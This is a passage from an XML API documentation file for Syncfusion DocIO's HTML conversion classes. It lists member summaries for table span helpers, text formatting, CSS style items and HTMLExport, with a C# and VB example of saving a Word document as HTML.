        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.LfoStack">
            <summary>
            Gets the lfo stack.
            </summary>
            <value> lfoName .</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.ListStack">
            <summary> 
            Gets the list stack.
            </summary>
            <value>The list stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.CurrentListStyle">
            <summary>
            Gets the current list style.
            </summary>
            <value>The current list style.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.ResetCurrColumn">
            <summary>
            Resets the curr column.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.UpdateTableGrid(Syncfusion.DocIO.DLS.WTableCell,System.Single)">
            <summary>
            Updates the table grid.
            </summary>
            <param name="cell">The cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.NextColumn">
            <summary>
            Nexts the column.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.AddRowSpan(System.Int32)">
            <summary>
            Adds the rowspan.
            </summary>
            <param name="rowspan">The rowspan.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.GetTableGrid(System.Collections.Generic.Dictionary{System.Int32,System.Collections.Generic.List{System.Object}})">
            <summary>
            Gets the table grid from table grid collection
            </summary>
            <param name="tableGridCollection"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.UpdateTable(Syncfusion.DocIO.DLS.WTable,System.Collections.Generic.Stack{System.Collections.Generic.Dictionary{System.Int32,System.Collections.Generic.List{System.Object}}},System.Single)">
            <summary>
            Updates the table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.UpdateRowSpan(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Update Row span
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.IsEmptyCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Check whether the cell is an empty cell
            </summary>
            <param name="cell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.UpdateEmptyCellWidth(System.Collections.Generic.List{System.Object},Syncfusion.DocIO.DLS.WTableRow,System.Collections.Generic.List{System.Object})">
            <summary>
            Updating Empty cell width
            </summary>
            <param name="emptyCellIndex"></param>
            <param name="row"></param>
            <param name="m_tableGrid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.AdjustNestedTable(Syncfusion.DocIO.DLS.WTable,System.Single)">
            <summary>
            Adjust Nested table
            </summary>
            <param name="table"></param>
            <param name="width"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.AddColumn">
            <summary>
            Adds the column.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.AddColumn(System.Int32)">
            <summary>
            Adds the column.
            </summary>
            <param name="cellsCount">The cells count.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.SpanHelper.TableGridCollection">
            <summary>
            Gets/Sets the collection of row grid for a table
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Style">
            <summary>
            Specifies the text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Borders">
            <summary>
            Specifies the Borders
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.#ctor">
            <summary>
            Initialize the formatting properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.SetPropertyValue(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="Key"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.HasKey(System.Int32)">
            <summary>
            
            </summary>
            <param name="Key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.HasValue(System.Int32)">
            <summary>
             Determines whether the specified property key has value.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Set the values for the properties
            </summary>
            <param name="Key"></param>
            <param name="value"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.WordWrap">
            <summary>
            Gets or sets a value indicating whether to break lines on word or character level. By default line breaks on word level.
            </summary>
            <value>
              <c>true</c> if line breaks on word level; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.IsPreserveWhiteSpace">
            <summary>
            Gets/ Sets whether white space need to be preserved
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Hidden">
            <summary>
            Gets/ Sets Hidden property of text
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.AllCaps">
            <summary>
            Gets/ Sets All Caps
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.SmallCaps">
            <summary>
            Gets or sets a value indicating whether the text has small caps formatting
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.CharacterSpacing">
            <summary>
            Gets/Sets visited Link color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.PageBreakBefore">
            <summary>
            Gets/Sets PageBreakBefore
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.PageBreakAfter">
            <summary>
            Gets/Sets PageBreakAfter
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.LineSpacingRule">
            <summary>
            Gets/Set Linespacing rule
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TabPosition">
            <summary>
            Get or set a value to represents custom tab stop postion
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TabLeader">
            <summary>
            Get or set a value to represents custom tab leader
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TabJustification">
            <summary>
            Get or set a value to represents custom tab alignment
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TabWidth">
            <summary>
            Get or set a value to represents current tab width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.IsInlineBlock">
            <summary>
            Get or set a value to represents whether the element has line of block text
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.IsNonBreakingSpace">
            <summary>
            Get or set a value indicating whether the element contains Non breaking white space characters
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.IsListTab">
            <summary>
            Get or set a boolean indicating whether the current span element is list tab
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.ListNumberWidth">
            <summary>
            Get or set a value that represents the list number width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.PaddingLeft">
            <summary>
            Get or set a value that represents the list padding left value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Bold">
            <summary>
            Specifies Bold format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Italic">
            <summary>
            Specifies Italic format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Underline">
            <summary>
            Specifies Underline format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.Strike">
            <summary>
            Specifies Strike format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.FontColor">
            <summary>
            Specifies font color of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.BackColor">
            <summary>
            Specifies back color of the text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.FontFamily">
            <summary>
            Specifies the font family.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.FontSize">
            <summary>
            Specifies the font size.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.LineHeight">
            <summary>
            Specifies the line height.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.IsLineHeightNormal">
            <summary>
            Specifies whether the line height is Normal or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TextAlign">
            <summary>
            Specifies the text alignment.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.LeftMargin">
            <summary>
            Specifies the left margin.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TextIndent">
            <summary>
            Specifies the Text indent.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.RightMargin">
            <summary>
            Specifies the Right margin
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.TopMargin">
            <summary>
            Specifies the Top margin
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.BottomMargin">
            <summary>
            Specifies the Bottom margin
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat.SubSuperScript">
            <summary>
            Specifies Superscript/SubScript
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.AllColor">
            <summary>
            Variable specifies the color value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.AllWidth">
            <summary>
            Variable specifies the width value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.AllStyle">
            <summary>
            Variable specifies the style value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.TopColor">
            <summary>
            Variable specifies the Top color value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.BottomColor">
            <summary>
            Variable specifies the bottom color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.LeftColor">
            <summary>
            Variable specifies the left color value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.RightColor">
            <summary>
            Variable specifies the right color value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.TopStyle">
            <summary>
            Variable specifies the TopStyle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.BottomStyle">
            <summary>
            Variable specifies the BottomStyle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.LeftStyle">
            <summary>
             Variable specifies the LeftStyle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.RightStyle">
            <summary>
            Variable specifies the RightStyle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.TopWidth">
            <summary>
            Variable specifies the TopWidth.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.BottomWidth">
            <summary>
            Variable specifies BottomWidth. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.LeftWidth">
            <summary>
             Variable specifies LeftWidth. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.RightWidth">
            <summary>
            Variable specifies RightWidth.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.BottomSpace">
            <summary>
            Variable specifies BottomSpace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.TopSpace">
            <summary>
            Variable specifies TopSpace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.LeftSpace">
            <summary>
            Variable specifies LeftSpace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.RightSpace">
            <summary>
            Variable specifies RightSpace.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HTMLConverterImpl.TableBorders"/> class.
            </summary>
            <param name="parent">The parent.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLConverterImpl.ThreeState">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CSSStyle.GetCSSStyleItem(System.String,Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType)">
            <summary>
            Gets the CSS style item
            </summary>
            <param name="styleName"></param>
            <param name="styleType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CSSStyle.Close">
            <summary>
            dispose the CSS style 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyle.StyleCollection">
            <summary> 
            Get and set the CSS style collection
            </summary>
            <value>The list style collection.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CSSStyleItem.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.StyleName">
            <summary>
            Get and set the CSS style name.
            </summary>
            <value>The style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.StyleType">
            <summary>
            Get and set the CSS style type
            </summary>
            <value>The style type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.PropertiesHash">
            <summary>
            Gets the properties hash value.
            </summary>
            <value>The properties hash.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.ImportantPropertiesHash">
            <summary>
            Gets the important properties hash value.
            </summary>
            <value>The important properties hash.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.Item(Syncfusion.DocIO.DLS.CSSStyleItem.TextFormatKey)">
            <summary>
            Get and set the properties hash value.
            </summary>
            <value>The properties hash.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CSSStyleItem.Item(Syncfusion.DocIO.DLS.CSSStyleItem.TextFormatImportantKey)">
            <summary>
            Get and set the important properties hash value.
            </summary>
            <value>The important properties hash.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType">
            <summary>
            Defines CSS selector style type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.None">
            <summary>
            Defines style type as none.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.ElementSelector">
            <summary>
            Defines style type as element selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.IdSelector">
            <summary>
            Defines style type as id selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.ClassSelector">
            <summary>
            Defines style type as class selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.GroupingSelector">
            <summary>
            Defines style type as grouping selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.DescendantSelector">
            <summary>
            Defines style type as descendant selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.ChildSelector">
            <summary>
            Defines style type as child selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.AdjacentSiblingSelector">
            <summary>
            Defines style type as adjacent sibling selector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CSSStyleItem.CssStyleType.GeneralSiblingSelector">
            <summary>
            Defines style type as general sibling selector.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CSSStyleItem.TextFormatKey">
            <summary>
            Defines text format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CSSStyleItem.TextFormatImportantKey">
            <summary>
            Defines important text format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLExport">
            <summary>
            Represents the conversion implementation of Word document as HTML file.
            </summary>
            <remarks>This class, its properties and methods are not supported in Silverlight, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>
            <para>The following code example demonstrates how to convert Word to HTML file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Loads an existing document
                WordDocument document = new WordDocument("Template.docx");
                HTMLExport export = new HTMLExport();
                //The images in the input document will be copied to this folder
                document.SaveOptions.HtmlExportImagesFolder = @"D:\Data\";
                //The headers and footers in the input will be exported
                document.SaveOptions.HtmlExportHeadersFooters = true;
                //Export the text form fields as editable
                document.SaveOptions.HtmlExportTextInputFormFieldAsText = false;
                //Set the style sheet type
                document.SaveOptions.HtmlExportCssStyleSheetType = CssStyleSheetType.External;
                //Set name for style sheet
                document.SaveOptions.HtmlExportCssStyleSheetFileName = "UserDefinedFileName.css";
                //Set the use absolute path as true
                export.UseAbsolutePath = true;
                //Save the document as html file
                export.SaveAsXhtml(document, "WordtoHtml.html");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Loads an existing document
                Dim document As New WordDocument("Template.docx")
                Dim export As New HTMLExport()
                'The images in the input document will be copied to this folder
                document.SaveOptions.HtmlExportImagesFolder = "D:\Data\"
                'The headers and footers in the input will be exported
                document.SaveOptions.HtmlExportHeadersFooters = True
                'Export the text form fields as editable
                document.SaveOptions.HtmlExportTextInputFormFieldAsText = False
                'Set the style sheet type
                document.SaveOptions.HtmlExportCssStyleSheetType = CssStyleSheetType.External
                'Set name for style sheet
                document.SaveOptions.HtmlExportCssStyleSheetFileName = "UserDefinedFileName.css"
                'Set the use absolute path as true
                export.UseAbsolutePath = True;
                'Save the document as html file
                export.SaveAsXhtml(document, "WordtoHtml.html")
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_cacheFilesInternally">
            <summary>
            Cache files as stream
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_hasNavigationId">
            <summary>
            Has navigation id
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_hasOEBHeaderFooter">
            <summary>
            OEB header and footer
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_nameID">
            <summary>
            Auto incrementing pointer for navigation point
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_headingStyles">
            <summary>
            Holds heading styles
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_styleSheet">
            <summary>
            Holds the name and data of stylesheets
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_imageFiles">
            <summary>
            Holds the name and data of image files
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_bookmarks">
            <summary>
            Bookmark collection for TOC
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLExport.m_ftntRefAttrStr">
            <summary>
            Footnote Reference Attribute string
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.SaveAsXhtml(Syncfusion.DocIO.DLS.WordDocument,System.String)">
            <summary>
            Saves the Word document as XHTML file.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to be saved as html.</param>
            <param name="fileName">The <b>string</b> that specifies the name to save the html file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.SaveAsXhtml(Syncfusion.DocIO.DLS.WordDocument,System.IO.Stream,System.Boolean)">
            <summary>
            Saves as XHTML.
            </summary>
            <param name="doc">Word document to convert</param>
            <param name="stream">Stream to save</param>
            <param name="EPub">True if XHTML is created for EPub format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.SaveAsXhtml(Syncfusion.DocIO.DLS.WordDocument,System.IO.Stream)">
            <summary>
            Saves the Word document as XHTML file in a stream.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to be saved as html.</param>
            <param name="stream">The <see cref="T:System.IO.Stream"/> to save the html file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteXhtml(Syncfusion.DocIO.DLS.WordDocument,System.String)">
            <summary>
            Writes the XHTML.
            </summary>
            <param name="doc">The doc.</param>
            <param name="cssFileName">Name of the CSS file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteBody(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Writes body
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStyleSheet(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Writes the style sheet.
            </summary>
            <param name="doc">The doc.</param>
            <param name="cssFileName">Name of the CSS file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.AppendStyleSheet(Syncfusion.DocIO.DLS.Style,System.Text.StringBuilder)">
            <summary>
            Append style sheet
            </summary>
            <param name="style"></param>
            <param name="sb"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.AppendLine(System.Text.StringBuilder,System.String)">
            <summary>
            Appends the line.
            </summary>
            <param name="sb">The sb.</param>
            <param name="textline">The textline.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteSection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Writes the section.
            </summary>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFootnotes(Syncfusion.DocIO.FootnoteType)">
            <summary>
            Writes the footnotes.
            </summary>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTextBody(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Write text body
            </summary>
            <param name="body"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteBodyItem(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Writes the body item.
            </summary>
            <param name="bodyItem">The body item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Writes the paragraph.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteParagraphItems(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Writes the paragraph items.
            </summary>
            <param name="paraItems">The para items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CombineTextInSubsequentTextRanges(Syncfusion.DocIO.DLS.ParagraphItemCollection,System.Int32@)">
             <summary>
            To combine the text in the subsequent textranges whether it has same character format
             </summary>
             <param name="paraItemCollection"></param>
             <param name="index"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteBreak(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Write break
            </summary>
            <param name="item"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTextBox(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Writes the text box.
            </summary>
            <param name="textBox">The text box.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFootnote(Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            Writes the footnote.
            </summary>
            <param name="wFootnote">The w footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFootnoteSpan(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Write footnote span
            </summary>
            <param name="footnote"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFtntAttributes(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Writes the footnote attributes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFormField(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Writes the form field.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteParagraphOrList(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Writes the paragraph or list.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.EnsureWithinDivision(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Ensure within Division
            </summary>
            <param name="para"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteParaStyle(Syncfusion.DocIO.DLS.WParagraph,System.String,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Write style attribute for paragraph
            </summary>
            <param name="para"></param>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.IsHeadingStyleNeedToPreserveAsElementSelector(System.String)">
            <summary>
            Check whether the style is heading style
            </summary>
            <param name="styleName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteList(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.DLS.WParagraph,System.String)">
            <summary>
            Write List 
            </summary>
            <param name="listFormat"></param>
            <param name="para"></param>
            <param name="style"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCharacterFormatOfList(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the CharacterFormat of the list
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CopyCharacterFormatting(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Copys Character formatting
            </summary>
            <param name="destFormat"></param>
            <param name="sourceFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.EnsureStyle(System.String,System.String)">
            <summary>
            Ensure whether the style is already defined and appends the style accordingly
            </summary>
            <param name="currentStyle"></param>
            <param name="existingStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ValidateStyle(System.String,System.String)">
            <summary>
            Removes duplicate style attribute entry
            </summary>
            <param name="p">Name of the style</param>
            <param name="style">Current style</param>
            <returns>validated style</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteListStartTag(Syncfusion.DocIO.DLS.WListFormat,System.Int32)">
            <summary>
            Write list start tag
            </summary>
            <param name="listFormat"></param>
            <param name="startAt"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStartValue(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets StartAt Value for current list level
            </summary>
            <param name="listFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.PreserveListAsPara(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.DLS.WParagraph,System.String)">
            <summary>
            Preserve List as paragraph tag
            </summary>
            <param name="listFormat"></param>
            <param name="para"></param>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.PreserveBulletsAndNumberingAsText(Syncfusion.DocIO.DLS.WListFormat,System.Int32)">
            <summary>
            Write prefix value for List
            </summary>
            <param name="listFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTabSpace(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Write tab space for list
            </summary>
            <param name="listFormat"></param>
        </member>
